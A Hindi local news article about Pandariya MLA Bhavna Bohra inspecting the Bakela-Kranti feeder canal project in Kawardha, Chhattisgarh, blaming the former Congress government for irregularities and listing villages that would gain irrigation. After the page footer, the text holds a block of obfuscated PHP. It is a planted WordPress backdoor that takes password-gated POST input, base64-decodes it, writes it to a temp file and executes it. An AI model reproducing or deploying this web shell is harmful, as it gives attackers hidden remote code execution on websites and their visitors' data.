कवर्धाछत्तीसगढ़

बाकेला-क्रांति जलाशय निरिक्षण के दौरान भावना बोहरा ने कहा किसानों और ग्रामीणों की सुविधा हमारी प्राथमिकता

बकेला-क्रांति नहर विस्तारीकरण कार्य का भावना बोहरा ने किया निरिक्षण, कहा किसानों और ग्रामीणों के सुझाव हमारे लिए महत्वपूर्ण

किसानों और ग्रामीणों की सुविधा हमारी प्राथमिकता, बकेला-क्रांति नहर का निर्माण कार्य जल्द पूर्ण होगा: भावना बोहरा

कवर्धा। पंडरिया विधानसभा में सिंचाई व पेयजल हेतु पर्याप्त जल आपूर्ति के लिए कुकदुर मंडल अंतर्गत निर्मित होने वाले बकेला-क्रांति फीडर केनाल के प्रस्तावित स्थल का पंडरिया विधायक ने यथास्थल पर जाकर निरिक्षण किया एवं ग्रामीणों व किसानों के साथ भी उन्होंने चर्चा कर अधिकारियों को निर्देशित किया। इस दौरान किसानों की मांग को लेकर भी भावना बोहरा ने अधिकारियों को संज्ञान में लेते हुए किसान हित को प्राथमिकता देने की बात कही साथ ही सर्वे के कार्य एवं पूर्व में हुए कार्यों की भी समीक्षा उनके द्वारा की गई। विदित हो कि पूर्व की कांग्रेस सरकार के दौरान ओपन नहर को बंद नहर के रूप में परिवर्तित कर दिया गया था इसके साथ ही विभाग द्वारा बिना टेंडर जारी किये पाइप लाइन की सप्लाई व उसका भुगतान भी कर दिया गया था, परन्तु भावना बोहरा द्वारा इस विषय में हस्तक्षेप के बाद पाइप लाइन की सप्लाई को रोका गया।

इस दौरान भावना बोहरा ने कहा कि किसानों का हित एवं क्षेत्रवासियों की सुविधा ही हमारी प्राथमिकता है। किसानों द्वारा सिंचाई हेतु पर्याप्त जल की आपूर्ति हेतु यह बहुप्रतीक्षित मांग थी, परन्तु पूर्ववर्ती कांग्रेस सरकार के दौरान इस कार्य में हुए अनियमितता के कारण इसमें विलंब हुआ। सर्वे के कार्य में भी किसानों व ग्रामीणों द्वारा अनियमितता की जानकारी मिली है जिसके लिए अधिकारियों को निर्देशित किया गया है वहीं किसानों व ग्रामीणों की मांग को प्राथमिकता देते हुए अधिकारियों को केनाल निर्माण के कार्य को जल्द पूरा करने हेतु निर्देश दिए हैं। किसानों की फसल अच्छी हो और उन्हें सिंचाई व ग्रामीणों को निस्तारी कार्य के लिए पर्याप्त पानी मिल सके यही हमारा लक्ष्य है और इसी के तहत इस केनाल का जल्द निर्माण हो सके इसके लिए आज ग्रामीणों व किसानों के साथ हमने यथास्थल का निरिक्षण किया है।

भावना बोहरा ने आगे कहा कि हमारे किसान भाई-बहन हर मौसम में चाहे वह तपती धूप हो या कड़ाके की ठण्ड या बारिश हर समय हमें भोजन उपलब्ध कराने के लिए कड़ा परिश्रम करते हैं, खून-पसीना एक कर फसल उगाते हैं ताकि कोई भूखा न रहें। ऐसे में हमारा भी दायित्व बनता है कि उनके अधिकार व हित के लिए हम अपने दायित्वों को पूरा करें। पूर्व की कांग्रेस सरकार द्वारा इस परियोजना को माध्यम से अपने करिबिर्यों व चहेतों को लाभ पहुंचाने के उद्देश्य से भ्रष्टाचार करने का प्रयास किया गया, जिसके लिए हमने मिलकर आवाज उठाई। परन्तु अब छत्तीसगढ़ में डबल इंजन की भाजपा सरकार है जहाँ किसानों व जनता का सर्वांगीण विकास एवं उनके हितों के प्रति कार्य करना ही हमारा एकमात्र उद्देश्य है। हमने किसानों व ग्रामीणों से भी च्चार्चा की इस दौरान उनके भी सुझाव लिए गए हैं। मैं उन्हें आश्वस्त करना चाहती हूँ कि उनके सुझावों को भी प्राथमिकता के साथ पूरा करने के लिए विभाग के अधिकारियों को निर्देश दिए गए हैं।

पंडरिया ब्लाक के गांवों में 30 हजार एकड़ रकबा सिंचित होगा

भावना बोहरा ने बताया कि पंडरिया ब्लाक के करीब 40 गांव को सिंचाई सुविधा देने के लिए 43.81 करोड़ रुपए की लागत से बकेला- क्रांति फीडर केनाल प्रोजेक्ट का निर्माण किया जा रहा है। केनाल बकेला से करीब 30 किलोमीटर दूर बीजाभाठा तक के गांवों में गुजरेगी। इससे 12 हजार हेक्टेयर यानी करीब 30 हजार एकड़ रकबा सिंचित होगा। इसमें मोहतरा, किशुनगढ़, पुसेरा, बांधा, पौनी, तिलाईभाट, पेंड्री, तोरला, नेउरगांव, महली, नानापुरी, सूरजपुरा, बघरा, महका, भैंसबोड़, बीजाभाठा, नौरोली, नवगांव मुसऊ सहित दो दर्जन से अधिक गांवों को फायदा पहुंचेगा, जहां गर्मी में जल संकट ज्यादा रहता है। इससे सिंचाई क्षमता बढ़ने से किसानों को भी लाभ मिलेगा और उन्हें अच्छी फसलों के साथ अधिक आर्थिक लाभ भी मिलेगा। इसमें केनाल के माध्यम से हाफ नदी नदी के पानी को क्रांति जलाशय के नहर में मिलाया जाएगा और इसके पास स्थित रमतला जलाशय को भी भरने का कार्य किया जाएगा जिससे क्षेत्र के हजारों किसान परिवारों को संचाई व ग्रामीणों को निस्तारी हेतु जल आपूर्ति होगी।

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
×

Powered by WhatsApp Chat

×
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}